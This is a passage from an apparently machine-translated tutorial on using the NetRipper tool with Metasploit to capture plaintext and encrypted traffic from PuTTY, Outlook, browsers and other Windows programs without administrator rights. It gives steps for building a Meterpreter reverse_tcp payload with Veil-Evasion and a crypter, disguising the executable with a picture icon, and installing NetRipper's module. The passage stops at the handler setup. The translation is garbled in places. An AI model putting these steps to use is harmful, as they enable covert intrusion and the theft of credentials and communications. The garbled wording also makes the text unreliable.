This year,the 2 3 annual Defcon conference in the USA Las Vegas Grand opening,and NetRipper it is in the current Defcon General Assembly for the first time available. NetRipper is a tool for Windows operating system vulnerabilities using the tool,it can use the API hooking from a low-privileged user where the intercepted network communication data and the encryption-related information,but also can capture the clear text communication data as well as encrypted communication data.
Click on the following address,can be in the Github home page, see about the project details:
NetRipper can provide users with a standalone command-line injectionmethod,if you can successfully invade a Windows operating system of the target host,then it can help you in target host system to load/execute arbitrary commands. But this article is going to introduce is a pre-compiled“malicious”executable method,this function is performed by the Meterpreter, a built-in reverse_tcp shell. We should also note,NetRipper can also fire Fox browser,Chrome,Lync(Skype for business),puTTY,WinSCP,SQL Server Management Program, and Microsoft Outlook client data injection and capture relevant network data. So,this article to be about is related to puTTY and Outlook,and related operations do not need to give administrator permissions or system permissions.
Exploit(experimental conditions)can be accomplished by the following steps:
Our focus of discussion will be placed in the reverse_tcp shell executable method.
Use Veil-Evasion to create one. exe file:
set LPORT 4 4 4 4
set USE_PHYERION Y
For output files set an initial file name,and then select the need to use the payload constructor.
And then with a Dolphin of the picture will be exe-executable file icons replace them,because the Dolphin is very special. In this step of the operation,you can use theResource Hackerto achieve.
In the use of Metasploit before,you need to download NetRipper and configure it:
(NetRipper install document:Readme):
git clone https://github.com/NytroRST/NetRipper.git cd NetRipper cd Metasploit cp netripper. rb /usr/share/metasploit-framework/modules/post/windows/gather/ mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper g++ -Wall netripper.cpp -o netripper cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/ cd ../Release cp DLL.dll /usr/share/metasploit framework/modules/post/windows/gather/netripper/DLL.dll
Settings you'll need to use the reverse processor,and start it: